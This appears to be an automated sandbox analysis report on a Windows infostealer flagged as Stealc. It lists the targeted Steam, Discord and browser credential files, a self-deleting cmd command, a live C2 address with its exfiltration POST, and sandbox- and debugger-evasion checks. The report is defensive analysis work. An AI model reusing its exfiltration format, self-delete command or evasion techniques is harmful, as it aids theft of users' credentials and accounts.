                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Software\Valve\Steam
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: SteamPath
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \config\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ssfn*
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: config.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DialogConfig.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: libraryfolders.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: loginusers.vdf
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Steam\
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: sqlite3.dll
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: browsers
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: done
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: soft
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: \Discord\tokens.txt
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: https
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: POST
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: HTTP/1.1
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: Content-Disposition: form-data; name="
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: build
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: token
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: file
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: message
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.d0000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_000E9030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DA210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_000DA210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D72A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_000D72A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DA2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000DA2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DC920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_000DC920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_000E40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_000DE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000D1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_000E47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_000E3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000E4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_000DDB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_000DEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DBE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_000DBE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000DDF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_000DDF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 39 46 42 35 38 31 37 41 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="hwid"2B9FB5817A3A4043728354------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build"tale------GHCAKKEGCAAFHJJJDBKJ--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000D62D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_000D62D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAKKEGCAAFHJJJDBKJHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 39 46 42 35 38 31 37 41 33 41 34 30 34 33 37 32 38 33 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 4b 4b 45 47 43 41 41 46 48 4a 4a 4a 44 42 4b 4a 2d 2d 0d 0a Data Ascii: ------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="hwid"2B9FB5817A3A4043728354------GHCAKKEGCAAFHJJJDBKJContent-Disposition: form-data; name="build"tale------GHCAKKEGCAAFHJJJDBKJ--
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.1743848806.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206$P
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/%
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php7)
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpG
                Source: file.exe, 00000000.00000002.1743848806.0000000000D87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206G
                Source: file.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001100980_2_00110098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80F80_2_005B80F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D0E60_2_0049D0E6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B0830_2_0052B083
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001021380_2_00102138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004EB1780_2_004EB178
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012B1980_2_0012B198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0053019D0_2_0053019D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003E71E20_2_003E71E2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005352130_2_00535213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013E2580_2_0013E258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001142880_2_00114288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0015B3080_2_0015B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C030D0_2_004C030D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014D39E0_2_0014D39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000FE5440_2_000FE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000F45730_2_000F4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001145A80_2_001145A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013D5A80_2_0013D5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005245B50_2_005245B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D15B40_2_005D15B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005295AA0_2_005295AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014A6480_2_0014A648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001166C80_2_001166C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001596FD0_2_001596FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052E6BD0_2_0052E6BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012D7200_2_0012D720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005337D00_2_005337D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001467990_2_00146799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001248680_2_00124868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001298B80_2_001298B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012B8A80_2_0012B8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013F8D60_2_0013F8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004859820_2_00485982
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00522A710_2_00522A71
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00527AA90_2_00527AA9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052CB190_2_0052CB19
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AAB0F0_2_005AAB0F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00140B880_2_00140B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144BA80_2_00144BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014AC280_2_0014AC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00531CA40_2_00531CA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013AD380_2_0013AD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00101D780_2_00101D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0012BD680_2_0012BD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00125DB90_2_00125DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00124DC80_2_00124DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0051BE160_2_0051BE16
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00118E780_2_00118E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00141EE80_2_00141EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004CCF240_2_004CCF24
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00525FD60_2_00525FD6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00520FA40_2_00520FA4
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 000D4610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_000E9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E3970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_000E3970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\EDWA6M3Y.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2137600 > 1048576
                Source: file.exeStatic PE information: Raw size of cbbjugzk is bigger than: 0x100000 < 0x19ee00
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.1698160628.0000000004B7B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cbbjugzk:EW;lfmofsyx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cbbjugzk:EW;lfmofsyx:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2142c2 should be: 0x2115c3
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: cbbjugzk
                Source: file.exeStatic PE information: section name: lfmofsyx
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005AA056 push ebp; mov dword ptr [esp], eax0_2_005AA0C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6041 push 15BCFBB8h; mov dword ptr [esp], edx0_2_005D60D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005D6041 push esi; mov dword ptr [esp], ebp0_2_005D60F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0055F073 push ecx; mov dword ptr [esp], edi0_2_0055F084
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000EE021 push es; iretd 0_2_000EE06A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0056003F push ecx; mov dword ptr [esp], esi0_2_00560744
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005670CA push edi; mov dword ptr [esp], edx0_2_00567143
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80F8 push eax; mov dword ptr [esp], esp0_2_005B819A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80F8 push eax; mov dword ptr [esp], edi0_2_005B824B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80F8 push ecx; mov dword ptr [esp], eax0_2_005B827C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005B80F8 push 6A23A3F6h; mov dword ptr [esp], eax0_2_005B8356
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005470FF push 5CFC29DFh; mov dword ptr [esp], esi0_2_00547206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D0E6 push edi; mov dword ptr [esp], 0B98CF4Ah0_2_0049D145
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D0E6 push ebp; mov dword ptr [esp], ecx0_2_0049D20E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D0E6 push edi; mov dword ptr [esp], 1462C404h0_2_0049D212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0049D0E6 push edx; mov dword ptr [esp], edi0_2_0049D24B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push ecx; mov dword ptr [esp], eax0_2_0052B0F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push edi; mov dword ptr [esp], 789BC950h0_2_0052B25A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx0_2_0052B277
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push esi; mov dword ptr [esp], edi0_2_0052B289
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push ecx; mov dword ptr [esp], edx0_2_0052B2A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push ecx; mov dword ptr [esp], eax0_2_0052B303
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push 12306FA0h; mov dword ptr [esp], ebp0_2_0052B35E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push 21C0B600h; mov dword ptr [esp], ecx0_2_0052B39B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push 5EB521A5h; mov dword ptr [esp], esp0_2_0052B450
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx0_2_0052B459
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push eax; mov dword ptr [esp], esi0_2_0052B49E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push 221BDC13h; mov dword ptr [esp], ebx0_2_0052B57C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push 42ADA826h; mov dword ptr [esp], edx0_2_0052B5A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push edi; mov dword ptr [esp], ecx0_2_0052B6B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0052B083 push ebp; mov dword ptr [esp], 7B149FD6h0_2_0052B6DD
                Source: file.exeStatic PE information: section name: cbbjugzk entropy: 7.953118561919161

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000E9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000E9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36586
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A241 second address: 53A275 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F55E4D1D2E6h 0x00000008 jno 00007F55E4D1D2D6h 0x0000000e jmp 00007F55E4D1D2E3h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A6B9 second address: 53A6D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F55E4D05126h 0x0000000a pop ecx 0x0000000b jmp 00007F55E4D0512Bh 0x00000010 push edi 0x00000011 jnc 00007F55E4D05126h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A6D8 second address: 53A6E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53A6E5 second address: 53A6E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
